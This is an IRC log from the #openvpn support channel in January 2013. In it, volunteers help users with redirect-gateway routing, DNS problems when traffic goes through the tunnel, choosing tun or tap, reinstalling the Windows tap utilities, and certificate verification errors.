[~devas@unaffiliated/devastator] has joined #openvpn 10:57 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 10:59 < thermoman> which question: vpn servers public IP is 1.2.3.4/24 and the vpn server pushes the route 1.2.3.0/24 to the client. 10:59 < thermoman> this works on linux because it sets a host-route to the default gateway 10:59 < thermoman> but not on linux 11:00 < thermoman> can i force windows to set a host-route to it's default-gw so the vpn server is still reachable over public internet where 1.2.3.0/24 is going over the tunnel? 11:01 < thermoman> . 11:01 < thermoman> found it: http://blog.spamt.net/archives/2006/11/02/mit_openvpn_eine_hostroute_auf_den_client_pushen/index.html 11:02 <@vpnHelper> Title: Mit openvpn eine hostroute auf den Client pushen | Stolzer DNS Spammer (at blog.spamt.net) 11:06 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 11:17 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 11:33 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 11:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 276 seconds] 11:40 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 11:40 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 11:46 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:46 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:46 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:46 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 11:49 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 11:54 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:57 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 12:00 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: Dieser Computer ist eingeschlafen] 12:01 -!- Netsplit *.net <-> *.split quits: ade_b 12:02 -!- Netsplit *.net <-> *.split quits: js_, colo-work, cherwin, videl, pnielsen, @novaflash, [Xaronic] 12:02 -!- Netsplit over, joins: cherwin, js_, videl, pnielsen 12:02 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has joined #openvpn 12:02 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 12:02 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 12:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 12:02 -!- Netsplit over, joins: [Xaronic] 12:02 -!- Netsplit over, joins: colo-work 12:08 -!- Suterusu1 [~EyeR@host81-156-138-35.range81-156.btcentralplus.com] has joined #openvpn 12:10 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 12:13 -!- raidz is now known as raidz_away 12:15 -!- exed_ [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 12:17 -!- raidz_away is now known as raidz 12:18 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 276 seconds] 12:19 -!- raidz is now known as raidz_away 12:20 -!- exed_ [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 248 seconds] 12:21 -!- thermoman [~thermoman@idle.foobar0815.de] has left #openvpn [""Wenn der Rechner versteckt ist, kann er von Hackern auch nicht gefunden werden." Antje Weber, Symantec"] 12:21 -!- raidz_away is now known as raidz 12:26 -!- raidz is now known as raidz_away 12:32 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 246 seconds] 12:34 -!- Suterusu1 [~EyeR@host81-156-138-35.range81-156.btcentralplus.com] has quit [Ping timeout: 264 seconds] 12:45 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 256 seconds] 12:48 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 13:00 -!- raidz_away is now known as raidz 13:08 -!- noize91_ [~noize91@83-65-220-227.hallein.xdsl-line.inode.at] has joined #openvpn 13:16 -!- noize91_ [~noize91@83-65-220-227.hallein.xdsl-line.inode.at] has quit [Remote host closed the connection] 13:16 -!- noize91 [~noize91@046-220-005-168.dyn.orange.at] has joined #openvpn 13:22 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 13:24 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 13:26 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has joined #openvpn 13:29 -!- noize91_ [~noize91@83-65-220-227.hallein.xdsl-line.inode.at] has joined #openvpn 13:29 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 13:31 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has quit [Ping timeout: 248 seconds] 13:31 -!- mattock is now known as mattock_afk 13:33 -!- noize91 [~noize91@046-220-005-168.dyn.orange.at] has quit [Ping timeout: 264 seconds] 13:33 -!- noize91_ is now known as noize91 13:35 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 13:40 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has joined #openvpn 13:41 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 13:41 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has quit [Client Quit] 13:43 -!- noize91 [~noize91@83-65-220-227.hallein.xdsl-line.inode.at] has quit [Ping timeout: 246 seconds] 13:43 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 13:43 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Max SendQ exceeded] 13:44 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 13:44 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Max SendQ exceeded] 13:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:45 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 13:46 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 13:46 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Max SendQ exceeded] 13:47 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 13:51 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 264 seconds] 13:57 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 13:57 < CrashTM> hey people 13:57 < CrashTM> anyone home? 13:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 14:00 < kunji> There are 163 people in the room, I'm attempting my first install of OpenVPN right now, so I probably can't answer your question, but just post it, don't ask to ask ^_^ 14:07 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:10 <@dazo> kunji++ :) 14:10 <@dazo> !ask 14:11 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 14:11 <@dazo> CrashTM: ^^^ 14:11 < CrashTM> well 14:11 < CrashTM> i got my server running 14:11 < CrashTM> i'm able to connect to it yet my traffic is not routed through my vpn 14:13 < CrashTM> anyone? 14:13 <@ecrist> kunji++ 14:14 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 14:15 < CrashTM> >.> 14:20 <@krzee> kunji++ 14:20 <@krzee> 3 karma points for a well placed statement! 14:21 * krzee high 5's kunji 14:21 <@krzee> CrashTM, 14:21 <@krzee> !redirect 14:21 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 14:21 <@vpnHelper> http://ircpimps.org/redirect.png 14:26 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 14:26 < wh1p> crashtm :? 14:26 < CrashTM> ok 14:26 < CrashTM> it is a dns problem 14:26 < CrashTM> i CAN ping 8.8.8.8 but i cannot ping google.com 14:27 <@krzee> well there ya go 14:27 <@krzee> glad to help =] 14:27 * krzee loves those flowcharts! 14:31 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 14:31 <@ecrist> krzee: you should consider rewriting them in graphiz or something editable 14:32 <@ecrist> because the ARE epic 14:32 <@krzee> thanks, not a bad idea… it'll have to wait til after my travels though 14:32 <@krzee> im in vegas right now, headed to all of california 14:32 <@ecrist> nice 14:32 <@krzee> testing 4 different wifi hotspots with my darknet voip service 14:33 <@ecrist> nice 14:33 <@ecrist> how's that project going? 14:33 <@krzee> fantastic 14:33 <@krzee> so far verizon is the best in vegas, but t-mobile is a near second 14:35 <@ecrist> non-LTE, and moving, tmo is best, imho 14:35 <@krzee> i suspect it will vary from area to area, which is why i bought 4 14:35 < kunji> Wow, thanks for the karma, first time that's happened to me on IRC ^_^, small question here, in the sample server.conf files is the function of ";" the same as of "#", that is, is it for a commented line? 14:36 <@krzee> kunji, yes 14:36 < kunji> krzee: cool, thanks 14:36 <@krzee> np 14:36 < CrashTM> thanks 14:36 <@ecrist> kunji: those are all standard comment delimiters 14:36 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Quit: Leaving] 14:37 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 248 seconds] 14:51 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 14:51 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 14:51 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 14:53 -!- swat [~swat@ubuntu/member/swat] has quit [Ping timeout: 245 seconds] 15:05 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 276 seconds] 15:06 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.] 15:11 -!- krzee [nobody@openvpn/community/support/krzee] has left #openvpn ["Leaving"] 15:20 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 244 seconds] 15:22 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 15:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 15:30 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 15:43 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:52 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 16:05 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 17.0.1/20121128204232]] 16:11 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 16:14 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 16:14 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has joined #openvpn 16:19 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:24 -!- B4ub [~b4ub@178.73.210.252] has joined #openvpn 16:25 -!- dazo is now known as dazo_afk 16:26 < B4ub> Ohai everybody ! 16:27 < B4ub> I'm using the 443 port (1194 is blocked), but the traffic is completely jammed on this port, which port do you think I can use ? 16:33 -!- moore1 [~moore@50.7.199.107] has joined #openvpn 16:35 < moore1> please i need help on this, i have openvpn server but my clients keeping on getting the same ip from it even after disconnecting and connecting back again 16:35 < moore1> what actually am i missing out to include ? 16:43 -!- B4ub [~b4ub@178.73.210.252] has quit [Remote host closed the connection] 16:46 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has joined #openvpn 16:47 -!- exed [~maximus@ppp-88-217-68-147.dynamic.mnet-online.de] has quit [Client Quit] 16:47 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 264 seconds] 16:48 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.225.wb.wifirst.net] has quit [Ping timeout: 264 seconds] 16:50 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 17:02 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:13 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 246 seconds] 17:14 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:15 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Excess Flood] 17:18 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has joined #openvpn 17:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:20 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has joined #openvpn 17:24 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 252 seconds] 17:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 17:30 -!- moore1 [~moore@50.7.199.107] has quit [Ping timeout: 265 seconds] 17:31 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 276 seconds] 17:32 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 17:32 -!- moore1 [~moore@vs749.rosehosting.com] has joined #openvpn 17:59 -!- moore1 [~moore@vs749.rosehosting.com] has quit [Ping timeout: 248 seconds] 18:00 -!- moore1 [~moore@50.7.199.107] has joined #openvpn 18:20 -!- moore1 [~moore@50.7.199.107] has quit [Ping timeout: 245 seconds] 18:23 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 18:30 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 18:35 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has quit [Quit: leaving] 18:37 -!- raidz is now known as raidz_away 18:42 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Read error: Operation timed out] 18:43 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has joined #openvpn 18:46 -!- raidz_away is now known as raidz 19:13 < kunji> moore1: Aren't they supposed to get the same ips? Unless you have an extremely short DHCP lease time. That's all I know about it though, I'm not even sure what OpenVPN uses to handle DHCP, let alone where/if you could change the lease time. 19:15 < kunji> Is there an easy way to check that OpenVPN is working correctly if I'm connecting from inside my network? It seems to be working, but I was hoping I could verify it for sure without having to go anywhere :P 19:15 <+pekster> (s)he is gone 19:17 < kunji> pekster: Yeah, whoops, I glanced through and saw a leave and came back, didn't notice the second leaving. 19:26 -!- raidz is now known as raidz_away 19:43 < kunji> Hmm, so I'm trying to send all traffic over the vpn connection. I have set push "redirect-gateway local def1 bypass-dhcp" on the server side, but it seems like my traffic isn't passing through the server. At least I don't see any spike in network traffic when watching the system monitor, even when downloading 720p video on Youtube, not really sure where to go from here. 19:46 <+pekster> If you're doing it from inside your network, that's expected behaviour because you still have a link-local route 19:47 < kunji> pekster: Oh, I guess I was thinking that's what the local bit was for, so I guess I'll just need to wait until I actually go elsewhere to try this. 19:47 <+pekster> The redirect-gateway impacts sources you don't have a route for, not local stuff (which alwyas prefers your locally-connected route) 19:48 <+pekster> s/sources/destinations/ 19:48 < kunji> pekster: Can I change that on the client side then? 19:48 <+pekster> Change what? 19:49 < kunji> pekster: For it to route everything through the vpn, Ubuntu used to do this, maybe still does, but I'm trying with a windows client right now and frankly windows and I don't play nice together with this kind of stuff. 19:50 <+pekster> The redirect-gateway OpenVPN option does the same thing on both OSs 19:51 < kunji> pekster: Right, I was asking if there was something else I could do to make it happen, maybe changing the local routing table? 19:52 <+pekster> What do you mean "make it happen" ? If you pass that parameter, it is working. When the client & server are on the same network, it proably won't do what you expect (at least without ugly NAT tricks) becuase the LAN's default gateway (the real gateway) will just send the return traffic directly back to the client 19:53 <+pekster> Unless you have errors in your log file about failed route commands, the redirect-gateway is doing exactly what it's supposed to 19:58 < kunji> pekster: I'm not saying that it isn't doing what it's supposed to, just that what it's supposed to do isn't what I was hoping to have happen. I want all of my traffic to pass through the vpn, not necessarily when I'm on the same network as now, but at least for when I'm on a different network. I just need it so that when I'm not on my network, that ALL traffic passes through the vpn, I can't have it being ambiguous whether or not my traf 20:00 <+pekster> Okay, you obvoiusly can't have "all" traffic, since the VPN traffic (the encrypted packets) need to go to the VPN server. And anything on a link-local network won't get redirected either, since that's a smaller (ie: more specific route.) However, eveyrthing else will be, as long as the VPN is up. Once it goes down, packets instantly go back to their usual paths 20:00 <+pekster> If any of those exceptions are problems for your setup, I'd suggest using a firewall to suplement the VPN operation to gaurentee expected operation 20:06 < kunji> pekster: Hmm, so you're saying that it does work as I expected so long as I am not on the local network and the VPN is up? Well, it shouldn't be hard to verify once I go get on a different network. The description originally sounded more complete than that, even stating the caveat that if your DHCP lease expires you could lose your connection because even the DHCP requests would be routed over the VPN. I would have thought that the DHCP 20:09 <+pekster> Being on the local network merely impacts the route reply traffic takes, *unless* you are perform source-NAT on packets from VPN clients flowing through the server 20:10 <+pekster> Externally, you need to NAT traffic since you're presumably using private IPs 20:11 <+pekster> !redirect 20:11 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 20:11 <@vpnHelper> http://ircpimps.org/redirect.png 20:11 <+pekster> kunji: There's a handy explanation and flowchart for you to follow 20:13 < kunji> pekster: you mean the vpn server's public ip, right? So the ip my modem receives... which is indistinguishable for me right now because I am on the local network. But like I was saying it will be easy to check later once I'm on a different network. 20:14 < kunji> pekster: interesting though I have not enabled ip forwarding, but can ping google.com, you don't need it enabled if you're bridging do you? 20:14 <+pekster> You're briding to your own local network? Don't do that... 20:15 < kunji> pekster: Hmm, why not? 20:15 <+pekster> Well, at least cocnnecting from inside doesn't do you any good what-so-ever 20:15 <+pekster> You just have a "2nd" IP address on the same network. Really pointless 20:16 < kunji> pekster: I know, it's for use from outside, I was just trying to do what testing I can from here, since I'm here now. 20:16 <+pekster> If you're trying to redirect traffic, you should probably be using routing (tun) anyway 20:16 <+pekster> You can't test it at all because of your setup. You could partially test if if you were using tun, not tap 20:16 <+pekster> !tunortap 20:16 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 20:16 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 20:16 <+pekster> You really don't want tap for this 20:16 < kunji> But tun won't do for LAN gaming no? It doesn't do broadcast. 20:17 <+pekster> You never mentioned anything about games requiring broadcasts, just redirecting remote traffic 20:17 <+pekster> My supply of crystal balls is running low 20:18 < kunji> pekster: Sorry man, I didn't mention the games because they're secondary, the primary concern is the remote traffic. Maybe I should just run 2 instances? 20:18 <+pekster> That might be easier, just to keep things nicely separated. tap VPNs are more complex since you're invovling both the VPN server and the network you're bridiging too 20:19 <+pekster> Many people mistakenly believe that since it's becomming a part of the existing network that it is easier, but they're ignoring the subtle complexities of combining routing requirements with an Ethernet-layer bridge 20:19 <+pekster> Ideally, just turn on IP forwarding, NAT if you're not using public IP space, and use a routed setup when you want to redirect Internet traffic (it's generally cleaner) 20:20 <+pekster> Normally I hate NAT-based solutions, but I assume your local network is *already* doing NAT upstream, so it's a wash either way 20:20 < kunji> pekster: Yeah, that's very much like what I used to do with pptp. 20:20 <+pekster> Also think of this: do you really want all your "gaming" VPN clients to send *all* their upstream traffic (from youtube, bittorrent, downloading linux distros, etc, etc) through your connection? 20:21 < kunji> pekster: Well, for the gaming bit, it would just be for a few friends, so we're taking like 3 connections for something like Age of Empires II for a few hours. 20:22 < kunji> pekster: So it wouldn't be bad, but well, I'm going to experiment a few days, and then I'll come back and bother you if it's not working out :P 20:23 <+pekster> It could be awful if you're using the same 'redirect-gateway' setup there 20:23 <+pekster> Do you have your friends stop any other downloads they might be doing before joining? Just run 2 separate VPNs and I suspect you'll be a lot happier 20:23 <+pekster> Or, what if they join and end up doing a huge steam update? That all gets redirected if you've asked it to ;) 20:24 < kunji> pekster: Their own internets aren't very good, they already shut everything else off when we game, sometimes they even stay off Skype and we have to type all game. 20:29 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:53 -!- Guest29478 [~cosmicgat@113.210.100.30] has joined #openvpn 21:26 -!- Guest29478 [~cosmicgat@113.210.100.30] has left #openvpn [] 22:05 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Quit: Leaving] 22:08 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 23:13 -!- MaxeyPad_ [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 255 seconds] 23:22 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 23:39 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn --- Day changed Fri Jan 11 2013 00:04 -!- eN_Joy [~eN_Joy@jindan.chem.ou.edu] has quit [Ping timeout: 246 seconds] 00:06 -!- eN_Joy [~eN_Joy@jindan.chem.ou.edu] has joined #openvpn 00:13 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Quit: Computer has gone to sleep.] 00:30 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 00:33 -!- moore1 [~moore@50.7.199.107] has joined #openvpn 00:33 -!- moore1 [~moore@50.7.199.107] has left #openvpn [] 00:43 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 264 seconds] 00:58 -!- mattock_afk is now known as mattock 01:21 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 01:25 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 01:27 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 01:32 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.] 01:35 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 01:35 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 02:02 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 02:04 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 02:36 -!- PeppiX [~PeppiX@89-96-212-226.ip14.fastwebnet.it] has joined #openvpn 02:37 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 02:38 < PeppiX> hi all 02:38 < PeppiX> I've a question about the last openvpn release (2.3.0) 02:39 < PeppiX> it's not presente the addtap binary 02:39 < PeppiX> how can I add another tap ? 02:39 <+pekster> PeppiX: That's a batch script, not a binary, and you need to install the 'tap-windows.exe' program that should be present in your .\bin\ path releative to your install dir 02:39 <+pekster> When you install it, just overwrite the default location (which should already exist) and select the 'Utilities' option that's unchecked by default 02:40 <+pekster> It's on my todo list to submit a patch to the developers so that's installed by default, but it was removed early on in the 2.3 pre-release cycle :\ 02:41 -!- zamba [marius@flage.org] has joined #openvpn 02:42 < zamba> when trying to establish a openvpn connection i get the following error: 02:42 < PeppiX> @pekster: thanks 02:42 < zamba> VERIFY ERROR: depth=1, error=self signed certificate in certificate chain: /C=KG/ST=NA/L...... 02:43 < zamba> TLS_ERROR: BIO read tls_read_plaintext error: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed 02:43 < PeppiX> the problem is that I haven't 'tap-windows.exe' in bin (under openvpn) 02:43 < zamba> http://pastie.org/5666688 02:43 < zamba> here's the full error 02:43 < PeppiX> I try again the install with 'options' checked :) 02:45 <+pekster> PeppiX: If you bust open the 'openvpn-install-2.3.0-I001-*.exe' file (* will vary depending on the 32 or 64-bit version) with 7-zip, that installer will also be present in the .\$TEMP\ dir. But I've confirmed it gets installed at \bin\tap-windows.exe in the official 2.3.0 release 02:46 <+pekster> However, in the rc1 and rc2 releases, the installer is *not* present at .\bin\ of the installed program, and only present in the openvpn installer via 7-zip or some other decompressor 02:48 <+pekster> zamba: Looks like the CA file in your config on the side that gives you that 'VERIFY ERROR' message can't tie the certificate the remote peer is presenting to the referenced CA 02:50 <+pekster> The certificate used by the remote peer must be signed by the CA you have a public key for (the CA certificate) on the system performing the verification 02:50 <+pekster> !certverify 02:50 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5 02:51 <+pekster> ^^ zamba, maybe that's helpful? 02:51 < zamba> pekster: ok, i'll check it out 02:51 < zamba> thanks :) 02:51 <+pekster> Here's more generic information: 02:51 <+pekster> !pki 02:51 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was 02:51 <@vpnHelper> signed specially as a server (see !servercert) 02:58 < PeppiX> @pekster I've extracted openvpn-install-2.3.0-I001-*.exe with 7-zip and I found tap-windows.exe 02:58 < PeppiX> now...to add another tap do I have to launch and install tap-windows.exe? 02:59 <+pekster> That's just an installer; the openvpn project installer already installed 'tap-windows' for you, but you need to *reinstall* with the optional "utilities" checkbox checked, which will give you the missing batch scripts 02:59 <+pekster> It's an annoyance that 2.3.0 removed it by default 03:00 < PeppiX> oh yeees 03:00 < PeppiX> done :) 03:00 < PeppiX> now I have 2 tap 03:00 < PeppiX> so I can use 2 vpn-certificate at the same time 03:00 < PeppiX> thanks a lot :L) 03:01 <+pekster> No problem :) 03:02 -!- PeppiX [~PeppiX@89-96-212-226.ip14.fastwebnet.it] has quit [] 03:03 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 265 seconds] 03:32 -!- dazo_afk is now known as dazo 03:55 -!- folivora [~out@46.19.34.64] has quit [Read error: Connection reset by peer] 03:55 -!- folivora_ [~out@46.19.34.64] has joined #openvpn 04:04 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 264 seconds] 04:06 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 276 seconds] 04:32 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 04:48 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds] 04:55 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 04:58 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Operation timed out] 05:06 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 05:12 -!- pie__ [~pie_@94-21-58-185.pool.digikabel.hu] has joined #openvpn 05:12 -!- pie__ [~pie_@94-21-58-185.pool.digikabel.hu] has quit [Changing host] 05:12 -!- pie__ [~pie_@unaffiliated/pie-/x-0787662] has joined #openvpn 05:16 -!- pie___ [~pie_@unaffiliated/pie-/x-0787662] has quit [Ping timeout: 272 seconds] 05:30 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 06:08 -!- dazo is now known as dazo_afk 06:19 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 255 seconds] 06:19 -!- defswork [~andy@141.0.50.105] has quit [Quit: Ex-Chat] 06:31 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 06:34 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 06:37 -!- igor__ [~igor@pd907e599.dip0.t-ipconnect.de] has joined #openvpn 06:43 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 06:56 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection timed out] 06:57 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 07:03 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 07:33 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 08:22 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Quit: leaving] 08:25 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 08:40 -!- bsdgeek 